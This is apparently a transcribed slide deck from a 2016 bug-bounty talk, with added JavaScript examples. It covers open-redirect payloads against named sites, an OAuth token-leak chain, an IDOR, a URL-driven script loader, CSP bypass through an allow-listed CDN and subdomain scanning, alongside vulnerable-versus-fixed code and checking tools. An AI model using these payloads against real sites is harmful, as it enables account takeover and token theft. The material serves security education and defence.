The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016

Post on 15-Jan-2017



detectify

The Secret Life of a Bug Bounty Hunter

Frans Rosén (@fransrosen)

"The Swedish Ninja"
Knowledge Advisor @detectify (twitter: @fransrosen)
Blog at labs.detectify.com
HackerOne #6 @ hackerone.com/thanks
Highest paid out bounty on H1: $30k


Rundown

1. Background
2. Approaching a target
3. Free money
4. Automation
5. Browsers
6. End


How it started


THEN I FREAKED OUT

etc…


Thailand


How it actually started


Approaching a target


SWFs


By @nirgoldschlager and @homakov
http://homakov.blogspot.se/2013/02/hacking-facebook-with-oauth2-and-chrome.html

http://www.breaksec.com/?p=6039

Facebook Connect

https://www.facebook.com/v2.2/dialog/oauth?scope=publish_actions,email&client_id=298315034451&response_type=token&redirect_uri=https://www.example.com/login

https://www.facebook.com/v2.2/dialog/oauth?scope=publish_actions,email&client_id=298315034451&response_type=token&redirect_uri=https://xxx.example.com/yyy

No restrictions! The redirect_uri was validated against the app's registered domain only, so any subdomain and any path under it was accepted. With response_type=token the access token is delivered in the URL fragment to whatever page that redirect_uri ends up on, so one open redirect anywhere on the domain is enough to leak it.

Open Redirect

https://www.victim.com/account/logout?redirect_url=https://example.com\@www.victim.com

https://www.linkedin.com/uas/login?session_redirect=https://example.com%252f@www.linkedin.com%2Fsettings

https://vimeo.com/log_in?redirect=/%09/example.com

https://test6473.zendesk.com/access/login?return_to=//example.com:%252525252f@test6473.zendesk.com/x

https://trello.com/login?returnUrl=/\example.com


Firefox…

Chrome: Invalid
Safari: Domain not found
Firefox: example.com!

https://www.mozilla.org/en-US/security/advisories/mfsa2015-129/
CVE-2015-7195
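The open-redirect payloads above all work by making one parser read a different host than another. As an added example (not from the talk), the snippet below runs the slide payloads through the WHATWG URL parser (Node's URL class, the same algorithm Chrome uses), after applying the server-side percent-decoding the payload was built for, and reports which host each one lands on. The victim origins are the sites the payloads target; the rejection of the Prezi Location header reproduces the "Chrome: Invalid" result, the behaviour that Firefox lacked before CVE-2015-7195.

```javascript
// Added example, not the talk's code: where do the slide's open-redirect
// payloads actually go once a WHATWG-compliant browser parses them?

// Apply percent-decoding `decodes` times (a redirect endpoint usually decodes
// its parameter once; double-encoded payloads survive that first decode),
// then resolve the result against the page issuing the redirect. Returns the
// host the browser would contact, or null when the parser rejects the URL
// (what Chrome shows as "Invalid").
function redirectHost(victimOrigin, rawParam, decodes = 1) {
  let value = rawParam;
  for (let i = 0; i < decodes; i++) {
    try {
      value = decodeURIComponent(value);
    } catch (e) {
      return null; // malformed percent-encoding
    }
  }
  try {
    return new URL(value, victimOrigin).hostname;
  } catch (e) {
    return null; // e.g. a host containing a newline or '#' after decoding
  }
}

// Payloads copied from the slides, paired with the origin they were aimed at.
const SLIDE_PAYLOADS = [
  // backslash ends the authority: host example.com, path /@www.victim.com
  { origin: 'https://www.victim.com', param: 'https://example.com\\@www.victim.com' },
  // only escapes when the server decodes twice (%252f -> %2f -> /)
  { origin: 'https://www.linkedin.com', param: 'https://example.com%252f@www.linkedin.com%2Fsettings' },
  // %09 decodes to a tab, which the URL parser strips: //example.com
  { origin: 'https://vimeo.com', param: '/%09/example.com' },
  // "/\" is treated as "//" for special schemes: scheme-relative URL
  { origin: 'https://trello.com', param: '/\\example.com' },
];

// Payloads that leave the victim's host under the given number of decodes.
function escapingPayloads(payloads = SLIDE_PAYLOADS, decodes = 1) {
  return payloads
    .filter((p) => {
      const host = redirectHost(p.origin, p.param, decodes);
      return host !== null && host !== new URL(p.origin).hostname;
    })
    .map((p) => p.param);
}

// The Location header Prezi emitted for the Firefox chain. With no decoding
// at all (a browser does not decode a Location header before parsing it),
// the host contains a raw "%0a%23", which the host parser rejects.
const PREZI_LOCATION = '//example.com%0a%23.prezi.com';
```

Run `escapingPayloads()` to list the payloads that work with one decode; the LinkedIn one only escapes with `decodes = 2`, and `redirectHost('https://prezi.com', PREZI_LOCATION, 0)` returns null, matching Chrome and Safari on the slide.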


Firefox + Prezi…

https://prezi.com/redirect/?url=//example.com%0a%2523.prezi.com

HTTP/1.1 301
Location: //example.com%0a%23.prezi.com

https://www.facebook.com/v2.2/dialog/oauth?scope=publish_actions,email&response_type=token&redirect_uri=https://prezi.com/redirect/%3furl=https://example.com%25250a%252523.prezi.com&client_id=298315034451

NOO! :(

Try the app + proxy


Note during the walkthrough

Structure of IDs: Numeric? ID hashes visible cross accounts?

Hashed IDs publicly available
Update other users / Get user info

ID as hashes, but visible using Google.
No check if user was in another company.

Bounty $3,000
https://hackerone.com/reports/23126
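The report above comes down to one missing check: knowing a hashed ID was treated as authorization. As an added example (not code from the report or the vendor), the handler below is shown as found and as fixed, on a constructed in-memory user store; the IDs, names and company names are made up, and the role model (admins may edit colleagues, members only themselves) is an assumption.

```javascript
// Added example, not the vendor's code: the IDOR behind the $3,000 report,
// on a constructed store. Opaque/hashed IDs are not secrets (these ones were
// indexed by Google), so access must be decided from the caller's identity.

// Constructed sample data; the keys stand in for the hashed IDs.
function makeStore() {
  return new Map([
    ['c0ffee01', { name: 'alice', company: 'acme', role: 'admin' }],
    ['c0ffee02', { name: 'bob', company: 'acme', role: 'member' }],
    ['deadbeef', { name: 'mallory', company: 'evilcorp', role: 'admin' }],
  ]);
}

// Only these fields may be changed through the update endpoint; everything
// else in the patch (company, role) is dropped rather than mass-assigned.
const PATCHABLE_FIELDS = ['name'];

function applyPatch(target, patch) {
  for (const field of PATCHABLE_FIELDS) {
    if (Object.prototype.hasOwnProperty.call(patch, field)) target[field] = patch[field];
  }
  return target;
}

// As found: whoever knows a target's hashed ID may update it. The caller is
// never looked at, so a user from another company can edit anyone.
function updateUserVulnerable(store, targetId, patch) {
  const target = store.get(targetId);
  if (!target) return { status: 404 };
  return { status: 200, user: applyPatch(target, patch) };
}

// Fixed: resolve the caller first, require the target to be in the caller's
// company, and require admin role for editing anyone but oneself. Unknown and
// cross-company targets get the same 404 so IDs cannot be confirmed.
function updateUser(store, actorId, targetId, patch) {
  const actor = store.get(actorId);
  if (!actor) return { status: 401 };
  const target = store.get(targetId);
  if (!target || target.company !== actor.company) return { status: 404 };
  if (actor.role !== 'admin' && actorId !== targetId) return { status: 403 };
  return { status: 200, user: applyPatch(target, patch) };
}

// Same membership check on the read side ("Get user info" on the slide).
function getUser(store, actorId, targetId) {
  const actor = store.get(actorId);
  if (!actor) return { status: 401 };
  const target = store.get(targetId);
  if (!target || target.company !== actor.company) return { status: 404 };
  return { status: 200, user: target };
}
```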

3rd-party scripts

(get)?(query|url|qs|hash)param

location\.(hash|href|search)\.match

k.type='text/javascript';var m,src=(m=location.href.match(/\bkxsrc=([^&]+)\b/)) && decodeURIComponent(m[1]);k.src=src||'https://cdn.krxd.net/controltag?confid=HrUwtkcl';

The loader above takes its script src from the kxsrc parameter of the embedding page's URL, so every site that includes it will load attacker-chosen JavaScript when a victim follows a link carrying that parameter.
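As an added example (not the talk's tooling), the snippet below turns the two grep patterns from the slide into a scanner for third-party scripts that read their configuration from the URL, and reproduces what the Krux-style loader on the slide resolves to for a given location.href, next to an allow-listed variant. The hardened variant is my suggestion, not a vendor fix; the `victim.example` and `evil.example` hosts are made up.

```javascript
// Added example, not the talk's code: find scripts that take parameters from
// the URL, and show what the slide's loader does with a crafted link.

// The two grep patterns from the slide, as JavaScript regexes.
const PARAM_READER_PATTERNS = [
  /(get)?(query|url|qs|hash)param/i,
  /location\.(hash|href|search)\.match/,
];

// Which of the patterns hit in a script's source text (by regex source).
function findParamReaders(scriptText) {
  return PARAM_READER_PATTERNS.filter((re) => re.test(scriptText)).map((re) => re.source);
}

// The loader from the slide, kept verbatim as a string so the scanner has
// something realistic to run over.
const LOADER_SNIPPET =
  "k.type='text/javascript';var m,src=(m=location.href.match(/\\bkxsrc=([^&]+)\\b/)) && decodeURIComponent(m[1]);" +
  "k.src=src||'https://cdn.krxd.net/controltag?confid=HrUwtkcl';";

const DEFAULT_SRC = 'https://cdn.krxd.net/controltag?confid=HrUwtkcl'; // from the slide

// Exactly the resolution the slide's loader performs, with location.href
// passed in so it runs outside a browser: ?kxsrc= overrides the script URL.
function resolveKxsrc(href) {
  const m = href.match(/\bkxsrc=([^&]+)\b/);
  const src = m && decodeURIComponent(m[1]);
  return src || DEFAULT_SRC;
}

// Hardened variant (assumption, not the vendor's fix): honour the override
// only if it parses as an https URL on an allow-listed host; otherwise fall
// back to the default instead of loading whatever the link says.
function resolveKxsrcSafe(href, allowedHosts = ['cdn.krxd.net']) {
  let override;
  try {
    override = new URL(href).searchParams.get('kxsrc');
  } catch (e) {
    return DEFAULT_SRC;
  }
  if (!override) return DEFAULT_SRC;
  let u;
  try {
    u = new URL(override);
  } catch (e) {
    return DEFAULT_SRC; // relative or garbage: ignore
  }
  if (u.protocol !== 'https:' || !allowedHosts.includes(u.hostname)) return DEFAULT_SRC;
  return u.href;
}
```

`findParamReaders(LOADER_SNIPPET)` flags the loader on the `location.href.match` pattern; `resolveKxsrc('https://victim.example/?kxsrc=https://evil.example/x.js')` returns the attacker's URL, while `resolveKxsrcSafe` on the same link returns the default tag.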

Paywalls


CSP bypass

script-src 'self' https://ajax.googleapis.com

https://html5sec.org/minichallenges/3

<script src=//ajax.googleapis.com/ajax/libs/angularjs/1.0.8/angular.js></script>

script-src 'self' https://cdn.mxpnl.com

script-src 'self' https://www.googleadservices.com

Allow-listing a whole host lets the page load any script that host serves, not just the one the site meant. A CDN that also hosts AngularJS (client-side template evaluation) or exposes JSONP endpoints therefore gives script execution under the policy.
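As an added example (not from the talk), the matcher below answers "does this script-src let the page load that URL?" for the policies on the slides, and shows why pinning the allow-list to a path (an assumption about the fix, not something the slides state) closes the AngularJS load. It implements the host-source matching rules of CSP Level 3 for scheme, host, `*.` wildcards, ports and path prefixes; nonces, hashes and 'strict-dynamic' are not modelled, and `victim.example` is a made-up page origin.

```javascript
// Added example, not the talk's code: a CSP script-src matcher for the
// cases on the slides (host-source matching per CSP Level 3, simplified).

// Token list of the script-src directive, or null if the policy has none.
function parseScriptSrc(policy) {
  for (const directive of policy.split(';')) {
    const parts = directive.trim().split(/\s+/);
    if (parts[0] && parts[0].toLowerCase() === 'script-src') return parts.slice(1);
  }
  return null;
}

function defaultPort(scheme) {
  return { http: '80', https: '443', ws: '80', wss: '443' }[scheme] || '';
}

// Match one host-source expression (https://cdn.example, *.example,
// https://cdn.example/libs/ ...) against a parsed script URL.
function hostSourceMatches(source, url, page) {
  const m = source.match(/^(?:([a-z][a-z0-9+.-]*):\/\/)?(\*|(?:\*\.)?[^/:*]+)(?::(\d+|\*))?(\/[^?#]*)?$/i);
  if (!m) return false;
  const [, scheme, host, port, srcPath] = m;
  const urlScheme = url.protocol.slice(0, -1).toLowerCase();
  const pageScheme = page.protocol.slice(0, -1).toLowerCase();
  if (scheme) {
    if (scheme.toLowerCase() !== urlScheme) return false;
  } else if (urlScheme !== pageScheme && urlScheme !== 'https') {
    return false; // schemeless source: page's scheme, or an upgrade to https
  }
  const h = host.toLowerCase();
  const urlHost = url.hostname.toLowerCase();
  if (h.startsWith('*.')) {
    if (!urlHost.endsWith(h.slice(1))) return false;
  } else if (h !== '*' && h !== urlHost) {
    return false;
  }
  if (port) {
    if (port !== '*' && port !== (url.port || defaultPort(urlScheme))) return false;
  } else if (url.port) {
    return false; // no port in the source: only the scheme's default port matches
  }
  if (srcPath) {
    // A path ending in "/" is a prefix; anything else must match exactly.
    if (srcPath.endsWith('/')) {
      if (!url.pathname.startsWith(srcPath)) return false;
    } else if (url.pathname !== srcPath) {
      return false;
    }
  }
  return true;
}

// Does `policy` allow the document at `pageUrl` to load the script at
// `scriptUrl`? Scheme-relative (//host/...) and relative URLs resolve
// against the page, as the browser does.
function scriptAllowed(policy, scriptUrl, pageUrl) {
  const sources = parseScriptSrc(policy);
  if (sources === null) return true; // no script-src (default-src fallback not modelled)
  const page = new URL(pageUrl);
  const url = new URL(scriptUrl, pageUrl);
  for (const raw of sources) {
    const src = raw.toLowerCase();
    if (src === "'none'") return false;
    if (src === "'self'") {
      if (url.origin === page.origin) return true;
      continue;
    }
    if (src.startsWith("'")) continue; // 'unsafe-inline', nonces, hashes: not URL sources
    if (/^[a-z][a-z0-9+.-]*:$/.test(src)) { // scheme-source such as https:
      if (src.slice(0, -1) === url.protocol.slice(0, -1)) return true;
      continue;
    }
    if (hostSourceMatches(raw, url, page)) return true;
  }
  return false;
}

const SLIDE_POLICY = "script-src 'self' https://ajax.googleapis.com"; // from the slide
const ANGULAR_SRC = '//ajax.googleapis.com/ajax/libs/angularjs/1.0.8/angular.js'; // from the slide
// Assumed fix: pin the allow-list to the library path the site actually uses.
const PINNED_POLICY = "script-src 'self' https://ajax.googleapis.com/ajax/libs/jquery/";
```

`scriptAllowed(SLIDE_POLICY, ANGULAR_SRC, 'https://victim.example/')` is true: the host-only allow-list lets the attacker's injected `<script>` tag load AngularJS from the CDN. With `PINNED_POLICY` the same tag is blocked while the site's own jQuery path still loads.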

All ze subdomains!

Subdomains

Free money

Facebook

POST /rest/v1.1/me/transactions?http_envelope=1 HTTP/1.1
Host: public-api.wordpress.com

cart[blog_id]=44444444

Google XXE

https://blog.detectify.com/2014/04/11/how-we-got-read-access-on-googles-production-servers/

Square hidden payload

Automation – Mr Roboto


Collect

1. Collect all subdomains
2. Sort by popularity
3. Inject www between pop2 and pop1
4. Use to scan further + deeper
5. Every day. On all targets.


Subdomains


Collect

1. Make requests to all domains
2. Save both headers + redirects + content

timeout 10 curl -sD - "http://$p" -L --insecure --max-time 5 > "streams/stream_pipe_$p"

Retroactive searching

Browser fun


Safari – the special lil’ snowflake ❄

Safari 6…

*press enter*

Safari 8…

Safari <= 8 Mixed Content UXSS

1. Find URL with Mixed Content
2. Use fragment payload to inject clickable link in console
3. SE (social engineering) to get user to open Inspect and click link
4. ???
5. PROFI-XSS-T!!!

Safari 9

Nice!


Safari 9 Host Header injection


One more thing

"Best X ever"


Best report

"Exploitable Self XSS at swagger.oculusvr.com using Clickjacking Game and bypassing of filter"

Best response


Best deal


Best bug hunting day ever

The Secret Life of a Bug Bounty Hunter

Frans Rosén (@fransrosen) – www.detectify.com